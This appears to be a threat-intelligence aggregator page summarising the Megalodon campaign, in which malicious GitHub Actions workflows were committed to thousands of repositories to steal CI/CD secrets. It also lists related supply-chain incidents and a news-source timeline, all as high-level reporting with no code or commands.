Megalodon GitHub CI/CD supply-chain campaign
Campaign
Summary
Hide ▲
Show ▼
The Megalodon campaign pushed 5,718 malicious commits into 5,561 GitHub repositories in about six hours, creating a broad CI/CD secret-theft risk across developer projects. Attackers used throwaway accounts and forged CI-style author identities to hide malicious GitHub Actions workflows inside ordinary-looking commits. Once merged, the workflows executed in pipelines and exfiltrated cloud credentials, SSH keys, OIDC tokens, and source-code secrets to a remote C2 server. The scale and automation make many repositories repeatable secret-harvesting targets.
Related Happenings
TrapDoor trap-core.js credential-stealing package malware
Malware Activity
First: 25.05.2026 08:59
Last: 25.05.2026 08:59
Sources 1
About this happening:
The **TrapDoor** package malware is spreading across **npm, PyPI, and Crates.io**, putting **developer secrets, cloud credentials, SSH keys, and crypto wallets** at risk. The malw...
TrapDoor trap-core.js credential-stealing package malware
Malware ActivityAbout this happening: The **TrapDoor** package malware is spreading across **npm, PyPI, and Crates.io**, putting **developer secrets, cloud credentials, SSH keys, and crypto wallets** at risk. The malw...
TrapDoor cross-ecosystem supply-chain campaign
Campaign
First: 25.05.2026 08:59
Last: 25.05.2026 08:59
Sources 1
About this happening:
The **TrapDoor** supply-chain campaign has expanded across **npm, PyPI, and Crates.io**, using **34+ malicious packages** to steal developer secrets and credentials. The operation...
TrapDoor cross-ecosystem supply-chain campaign
CampaignAbout this happening: The **TrapDoor** supply-chain campaign has expanded across **npm, PyPI, and Crates.io**, using **34+ malicious packages** to steal developer secrets and credentials. The operation...
Laravel Lang credential-stealer dropper delivered through malicious Composer packages
Malware Activity
First: 23.05.2026 23:48
Last: 23.05.2026 23:48
Sources 1
About this happening:
A **malicious Composer payload** in **Laravel Lang** packages now threatens **Linux, macOS, and Windows** developers with credential theft. The injected `src/helpers.php` dropper...
Laravel Lang credential-stealer dropper delivered through malicious Composer packages
Malware ActivityAbout this happening: A **malicious Composer payload** in **Laravel Lang** packages now threatens **Linux, macOS, and Windows** developers with credential theft. The injected `src/helpers.php` dropper...
TeamPCP supply-chain ecosystem shift and extortion partnerships
Threat Actor Meta
First: 22.05.2026 14:55
Last: 22.05.2026 14:55
Sources 1
How related:
The development comes as TeamPCP has weaponized the interlinked software supply chain to corrupt hundreds of open-source tools, worming their way through several ecosystems and extorting victims for profit in some cases.
About this happening:
**TeamPCP** has expanded its supply-chain abuse model across open-source ecosystems, raising the risk of downstream compromise and extortion at scale. The group has **corrupted hu...
TeamPCP supply-chain ecosystem shift and extortion partnerships
Threat Actor MetaHow related: The development comes as TeamPCP has weaponized the interlinked software supply chain to corrupt hundreds of open-source tools, worming their way through several ecosystems and extorting victims for profit in some cases.
About this happening: **TeamPCP** has expanded its supply-chain abuse model across open-source ecosystems, raising the risk of downstream compromise and extortion at scale. The group has **corrupted hu...
GitHub data exposed after GitHub breach
Data Leak
First: 20.05.2026 11:14
Last: 20.05.2026 11:14
Sources 1
About this happening:
GitHub confirmed **exfiltration** of **internal repositories**, making private code and related content potentially available to outsiders. Attackers on the **Breached cybercrime...
GitHub data exposed after GitHub breach
Data LeakAbout this happening: GitHub confirmed **exfiltration** of **internal repositories**, making private code and related content potentially available to outsiders. Attackers on the **Breached cybercrime...
Timeline
-
22.05.2026 14:55 2 articles · 5d ago
Initial report: Megalodon GitHub CI/CD supply-chain campaign
Initial DisclosureThe first phase focused on slipping malicious commits into repositories under forged CI-style identities. Those commits planted GitHub Actions workflows that could execute after merge and immediately start harvesting credentials from build environments.
Show sources
- Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows — thehackernews.com — 22.05.2026 14:55
- Megalodon GitHub Attack Targets 5,561 Repos with Malicious CI/CD Workflows — thehackernews.com — 22.05.2026 14:55